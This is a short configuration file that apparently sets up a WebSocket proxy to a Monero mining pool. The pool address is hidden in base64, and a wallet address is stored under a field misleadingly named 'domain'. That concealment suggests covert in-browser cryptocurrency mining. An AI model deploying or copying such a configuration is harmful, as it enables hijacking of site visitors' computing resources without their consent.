SERVER_WS=ws://h.keitaro.my.id
SERVER_TARGET=cG9vbC5oYXNodmF1bHQucHJvOjQ0Mw==
SERVER_SECRET=V4
SERVER_DOMAIN=43dLPWAodGZH1vdYFLa44QXsFbij2zuWwTdJZma2W5StJujPa11n4egCB373EF6w9t6T5j45KYMFu37imDsqmHHjRLay2AW
SERVER_CONNECTION=8
